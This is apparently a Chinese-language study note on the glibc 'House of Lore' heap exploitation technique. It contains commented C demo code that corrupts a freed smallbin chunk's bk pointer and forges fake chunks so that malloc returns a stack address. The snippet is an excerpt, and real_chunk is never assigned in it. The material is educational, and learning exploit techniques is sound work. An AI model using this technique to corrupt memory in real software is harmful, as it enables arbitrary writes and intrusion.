看了下原理,没有太多的东西,和house of spirit的思想是一样的,只是spirit是在fastbin大小的chunk范围内伪造fake chunk,而House of Lore是small bin 与 large bin大小的chunk , 不过后来因为large bin添加了保护措施,便无法再利用。
house of lore 相比会麻烦一点,毕竟smallbin的检查比较多,因而大部分准备都是为了能够绕过检测。
struct small_chunk fake_chunk; // At address 0x7ffdeb37d050 struct small_chunk another_fake_chunk; struct small_chunk *real_chunk; unsigned long long *ptr, *victim; int len;
len = sizeof(struct small_chunk);
// Grab two small chunk and free the first one // This chunk will go into unsorted bin ptr = malloc(len); // points to address 0x1a44010
// The second malloc can be of random size. We just want that // the first chunk does not merge with the top chunk on freeing malloc(len); // points to address 0x1a440a0
// This chunk will end up in unsorted bin free(ptr);
// Grab another chunk with greater size so as to prevent getting back // the same one. Also, the previous chunk will now go from unsorted to // small bin malloc(len + 0x10); // points to address 0x1a44130
// Make the real small chunk's bk pointer point to &fake_chunk // This will insert the fake chunk in the smallbin real_chunk->bk = &fake_chunk; // and fake_chunk's fd point to the small chunk // This will ensure that 'victim->bk->fd == victim' for the real chunk fake_chunk.fd = real_chunk;
// We also need this 'victim->bk->fd == victim' test to pass for fake chunk fake_chunk.bk = &another_fake_chunk; another_fake_chunk.fd = &fake_chunk;
// Remove the real chunk by a standard call to malloc malloc(len); // points at address 0x1a44010
// Next malloc for that size will return the fake chunk victim = malloc(len); // points at address 0x7ffdeb37d060
